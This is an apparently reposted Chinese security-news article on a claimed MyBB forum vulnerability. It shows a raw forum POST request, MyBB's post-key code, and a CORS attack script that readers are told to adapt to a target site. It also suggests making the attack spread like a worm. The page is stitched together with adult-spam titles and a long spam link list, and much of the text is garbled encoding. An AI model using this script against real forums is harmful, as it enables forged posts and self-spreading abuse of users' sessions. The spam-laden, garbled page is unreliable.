精品一区精品二区制服_亚洲欧美日韩中文字幕一区二区三区 _色狠狠一区二区_国产精品一区二区久久国产

299

知名論壇系統(tǒng)MyBB被爆0day漏洞

時間: 2015-08-31 10:26:28   點擊數(shù): 39013   來源: 耐思智慧

MyBB是國際上非常優(yōu)秀的免費論壇軟件,最大的特色是簡單但是功能卻出奇的強大。支持多國語言,可以分別設(shè)置前臺后臺的語言,每個用戶都可以設(shè)置自己使用何種語言訪問論壇包括自己的時區(qū)等,自定義功能強大到?jīng)]有做不到只有想不到。

漏洞影響多個版本

本次影響版本:1.6x & 1.8x
測試版本:1.8.3 (最新), 以及1.6.16 (1.6系列最新)

正是因為其強大影響力,我便開始肆意玩耍MyBB以及監(jiān)控請求,在此期間我注意到一些極有可能導(dǎo)致漏洞出現(xiàn)的東西,這些都已經(jīng)在多個站點上進行了測試。

測試過程

首先損壞MyBB很簡單。當(dāng)你去發(fā)布一個新的帖子,在提交時它會請求一些東西,以下為來自Hackforums論壇post請求的示例:

POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1
Host: www.hackforums.net
User-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.hackforums.net/newreply.php?tid=4602700
Cookie: *
Connection: keep-alive
Content-Type: multipart/form-data; boundary=------71842462512788
Content-Length: 1588
------71842462512788
Content-Disposition: form-data; name="my_post_key"
******
------71842462512788
Content-Disposition: form-data; name="message_new"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="message"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="submit"
Post Reply
------71842462512788
Content-Disposition: form-data; name="action"
do_newreply
------71842462512788
Content-Disposition: form-data; name="replyto"
------71842462512788
Content-Disposition: form-data; name="posthash"
******
------71842462512788
Content-Disposition: form-data; name="attachmentaid"
------71842462512788
Content-Disposition: form-data; name="attachmentact"
------71842462512788
Content-Disposition: form-data; name="subject"
*
------71842462512788
Content-Disposition: form-data; name="quoted_ids"
------71842462512788
Content-Disposition: form-data; name="tid"
4602700
------71842462512788--

對于MyBB這個系統(tǒng)我們已經(jīng)了解它的一些字段了,其中第一個就是post key,如果沒有這個字段,我們就不能發(fā)送任何帖子。獲取這個key十分簡單,稍后我們會進行詳細(xì)解釋。現(xiàn)在我們需要獲取的是posthash,posthash僅僅只是一個MD5字符串,只需創(chuàng)建一個有效的MD5字符串就可以繞過它。我可以告訴你這是因為占位符的原因,但是深究其內(nèi)在不是我們今天要討論的問題。

盯著message_new和message字段,MyBB會提交這兩個字段,然而它僅顯示message字段中的內(nèi)容,而不會顯示message_new字段中的內(nèi)容。所以你可以在之前的帖子message_new字段中寫入cocks,當(dāng)然你無法從帖子中看出與之前有什么不同。

如何生成post key

post key會依賴以下函數(shù):

function generate_post_check() {     global $mybb, $session;     if($mybb->user['uid'])     {         return md5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);     }     // Guests get a special string     else     {         return md5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);     } }

接著驗證post key是否調(diào)用該函數(shù):

function verify_post_check($code, $silent=false) {     global $lang;     if(generate_post_check() != $code)     {         if($silent == true)         {             return false;         }         else         {             if(defined("IN_ADMINCP"))             {                 return false;             }             else             {                 error($lang->invalid_post_code);             }         }     }     else     {         return true;     } }

然后我們會看到它在查找loginkey, salt, regdate信息。現(xiàn)在我們獲取這些信息是相當(dāng)?shù)娜菀祝ㄎ也幌脒^多解釋,這個確實太容易了)一旦獲得post key,只要其是可用的并且用戶還未更改密碼(目前大多數(shù)論壇用戶很少有經(jīng)常修改密碼的習(xí)慣)。

好了,這就開始我們的攻擊。首先我們需要確定一個攻擊目標(biāo)(我在本機上搭建了一個站點),接著我寫了一個CORS腳本,然后用戶通過瀏覽器點擊一個用來請求帖子內(nèi)容的URL,URL在另一端獲取到請求后,進行處理但是不會進行消息提示。假設(shè)你構(gòu)造了一個合法的請求,你將會看到網(wǎng)頁的變化。

如何使用

基于不同的需求,可以構(gòu)造不同的請求。這可用于提交帖子,獲取論壇榮譽點等。如果你想把這個漏洞搞的像是蠕蟲病毒一般,只需每個訪問到帖子的人都在這個帖子下面繼續(xù)回復(fù)(這個需要把更多的精力放在獲取post key上),說實話這種可能非常高!

CORS代碼

注意:這只是來自appsec-labs的示例代碼,你需要進行一些修改以適合你的攻擊目標(biāo):

// I suggest adding jQuery to top of file // You will have to modify the code to make it more useable as I won't be modifying it for you. var url = 'http://forum.mytarget.com/'; $(document).ready(function() {      corsMyBBPost(); }); function corsMyBBPost() {     for(i=0; i<times; i++)     {         cors_send("post", url + "?proof_of_concept=1&req_num=" + i, "post=data", false);     } } function cors_send(method, url, data, credentials) {     var cors;     if (window.XDomainRequest)     {         cors = new XDomainRequest();         if (cors)         {             cors.onprogress = function() { CORSstatus("Process") };             cors.onload = function() { CORSresult(cors.responseText) };         }         else             CORSstatus("Browser does not support Cross Origin Request");     }     else if (window.XMLHttpRequest)     {         cors = new XMLHttpRequest();         cors.onreadystatechange = function() {             if (cors.readyState == 4)                 CORSresult(cors.getAllResponseHeaders(), cors.responseText);             else                 CORSstatus("Process");             }     }     else     {         CORSstatus("Browser does not support AJAX");     }     method = method.toUpperCase();     if (method == "POST" || method == "PUT")         cors.open(method, url, data);     else         cors.open(method, url);     if (credentials)         cors.withCredentials = "true";     cors.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");     cors.send(data);     CORSstatus("Cross Origin Resource Sharing - Start"); } function CORSstatus(msg) {      console.log(msg); } function CORSerror(msg) {      console.log("Oh shit..." + msg); }

不加任何修飾,這代碼十分簡潔。在此我不會描述如何盜取post key的方法,如果你自己有何領(lǐng)悟那是你自己的事情。

最后,希望大家能夠從中多學(xué)多一些東西。

上一篇:中小企業(yè)制作網(wǎng)站的技巧 下一篇:注冊微信公眾號選服務(wù)號還是訂閱號?

旗下網(wǎng)站:耐思智慧 - 淘域網(wǎng) - 我的400電話 - 中文域名:耐思尼克.cn 耐思尼克.top

耐思智慧 © 版權(quán)所有 Copyright © 2000-2025 IISP.COM,Inc. All rights reserved

備案號碼: 粵ICP備09063828號  公安備案號: 公安備案 粵公網(wǎng)安備 44049002000123號  域名注冊服務(wù)機構(gòu)許可:粵D3.1-20240003 CN域名代理自深圳萬維網(wǎng)

聲明:本網(wǎng)站中所使用到的其他各種版權(quán)內(nèi)容,包括但不限于文章、圖片、視頻、音頻、字體等內(nèi)容版權(quán)歸原作者所有,如權(quán)利所有人發(fā)現(xiàn),請及時告知,以便我們刪除版權(quán)內(nèi)容

本站程序界面、源代碼受相關(guān)法律保護, 未經(jīng)授權(quán), 嚴(yán)禁使用; 耐思智慧 © 為我公司注冊商標(biāo), 未經(jīng)授權(quán), 嚴(yán)禁使用

法律顧問:珠海知名律師 廣東篤行律師事務(wù)所 夏天風(fēng) 律師

精品一区精品二区制服_亚洲欧美日韩中文字幕一区二区三区 _色狠狠一区二区_国产精品一区二区久久国产
    • <ul id="wosu8"></ul>
    • <li id="wosu8"><option id="wosu8"></option></li>
      <ul id="wosu8"></ul>
    • <strike id="wosu8"><rt id="wosu8"></rt></strike>
    • 欧美日产一区二区三区在线观看| 欧美视频国产精品| 久久先锋影音av| 欧美日韩亚洲一区| 一区二区视频免费在线观看| 久久免费黄色| 国产精品久久久久久五月尺| 亚洲一二三区视频在线观看| 欧美国产视频在线| 激情成人在线视频| 久久综合伊人77777蜜臀| 国产精品视频男人的天堂| 性欧美video另类hd性玩具| 欧美日本中文字幕| 亚洲性感美女99在线| 欧美激情在线观看| 在线播放中文字幕一区| 麻豆成人在线观看| 国产日韩亚洲欧美精品| 久久精品91| 国产精品网曝门| 久久国产日本精品| 国产精品毛片va一区二区三区 | 亚洲少妇一区| 欧美电影免费| 亚洲视频axxx| 欧美日韩精品免费在线观看视频| 亚洲一区二区动漫| 欧美午夜精品久久久久久人妖| 香蕉乱码成人久久天堂爱免费| 国产精品www网站| 欧美一区二区三区在线| 在线成人免费观看| 老牛嫩草一区二区三区日本| 国内成人精品2018免费看| 欧美成人久久| 亚洲少妇一区| 欧美午夜片在线观看| 欧美一区二区| 国产视频在线观看一区| 免费在线观看成人av| 在线视频观看日韩| 国产精品h在线观看| 久久久精品欧美丰满| 国产一区视频网站| 欧美激情中文字幕乱码免费| 午夜精品福利在线| 国产日韩av高清| 欧美黄色aa电影| 午夜亚洲视频| 国产一区二区三区久久悠悠色av| 欧美黑人一区二区三区| 欧美一级二级三级蜜桃| 国产亚洲精品久久久久动| 欧美国产一区二区| 久久激情网站| 亚洲午夜久久久| 国产欧美日韩不卡| 欧美日韩精品免费看 | 欧美日韩一区二区三区在线视频 | 欧美激情中文不卡| 欧美一区二区三区喷汁尤物| 国产亚洲观看| 欧美日韩一区二区三区四区在线观看 | 性欧美video另类hd性玩具| 国产日韩欧美夫妻视频在线观看| 欧美电影免费观看高清| 欧美在线综合| 国产精品亚洲成人| 亚洲午夜久久久久久久久电影网| 国产精品色一区二区三区| 欧美高清在线一区二区| 欧美影院久久久| 精品av久久久久电影| 国产乱码精品一区二区三区av| 欧美激情1区2区3区| 久久精品在线免费观看| 亚洲一区在线免费观看| 国产一区二区三区视频在线观看| 欧美视频一区二区| 欧美激情一二三区| 久久综合综合久久综合| 欧美一区二区三区四区在线观看| 尤物精品在线| 国产婷婷色一区二区三区在线| 欧美性天天影院| 欧美日韩精品中文字幕| 欧美激情一区在线观看| 免费久久99精品国产自| 久久久天天操| 久久国产乱子精品免费女| 午夜精品av| 亚洲免费在线观看| 一区二区三区在线不卡| 国产视频一区在线| 国产日韩精品一区二区| 国产精品香蕉在线观看| 国产精品黄视频| 欧美性视频网站| 欧美私人网站| 欧美日精品一区视频| 欧美精品粉嫩高潮一区二区| 欧美黄色网络| 欧美国产视频在线| 欧美aa国产视频| 女女同性精品视频| 免费在线观看一区二区| 久久综合国产精品台湾中文娱乐网| 欧美在线视频网站| 欧美在线影院在线视频| 久久成人综合视频| 欧美在线一二三四区| 久久久久久国产精品一区| 久久精品国产欧美亚洲人人爽| 久久国产成人| 久久久午夜精品| 另类av一区二区| 欧美国产欧美综合| 欧美激情第三页| 欧美日韩三区| 国产精品久久久久久久久婷婷| 国产精品久久久久久久一区探花 | 欧美成人a∨高清免费观看| 久久久久久久综合日本| 久久人91精品久久久久久不卡| 久久亚洲一区二区| 老司机aⅴ在线精品导航| 欧美成人午夜77777| 欧美精品在线视频| 欧美日韩免费| 国产精品人成在线观看免费| 国产日韩av高清| 一区二区亚洲精品国产| 亚洲一区二区三区在线播放| 欧美一区日韩一区| 久久人体大胆视频| 免费在线看一区| 欧美色大人视频| 国产午夜精品一区二区三区视频| 国内一区二区在线视频观看 | 欧美日本国产| 国产精品久久九九| 国产日韩一区二区三区在线| 一区视频在线| 午夜精品久久久久99热蜜桃导演| 久久精品91久久久久久再现| 免费欧美日韩| 欧美性理论片在线观看片免费| 国产欧美一区二区精品仙草咪| 国内精品免费午夜毛片| 亚洲欧美三级伦理| 久热爱精品视频线路一| 欧美日韩免费在线视频| 国产欧美日韩91| 亚洲一区二区三区777| 久久久青草青青国产亚洲免观| 欧美国产日韩二区| 国产精品美女久久久久久久 | 樱桃视频在线观看一区| 午夜精品美女久久久久av福利| 久久综合伊人77777| 欧美色欧美亚洲高清在线视频| 国产亚洲欧美一区| 亚洲欧美精品伊人久久| 免费久久99精品国产| 国产精品国产福利国产秒拍| 好吊色欧美一区二区三区视频| 亚洲你懂的在线视频| 久久天天躁狠狠躁夜夜av| 欧美绝品在线观看成人午夜影视 | 久久久久se| 欧美激情在线有限公司| 欧美国产日韩一区二区| 欧美日韩在线观看一区二区三区| 国产精品综合av一区二区国产馆| 尤物精品在线| 久久久之久亚州精品露出| 欧美日韩中文字幕| 激情亚洲成人| 久久国产主播精品| 欧美人与性动交cc0o| 激情综合色综合久久| 欧美自拍偷拍| 欧美午夜视频在线观看| 中文有码久久| 欧美成人按摩| 国产啪精品视频| 欧美一区二区三区久久精品 | 在线一区欧美| 可以免费看不卡的av网站| 国产精品久线观看视频| 亚洲综合成人在线| 欧美精品aa| 极品裸体白嫩激情啪啪国产精品| 久久久久久久久综合| 国产精品亚洲成人| 久久av二区| 国产精品视频免费一区| 欧美影视一区| 国产精品卡一卡二|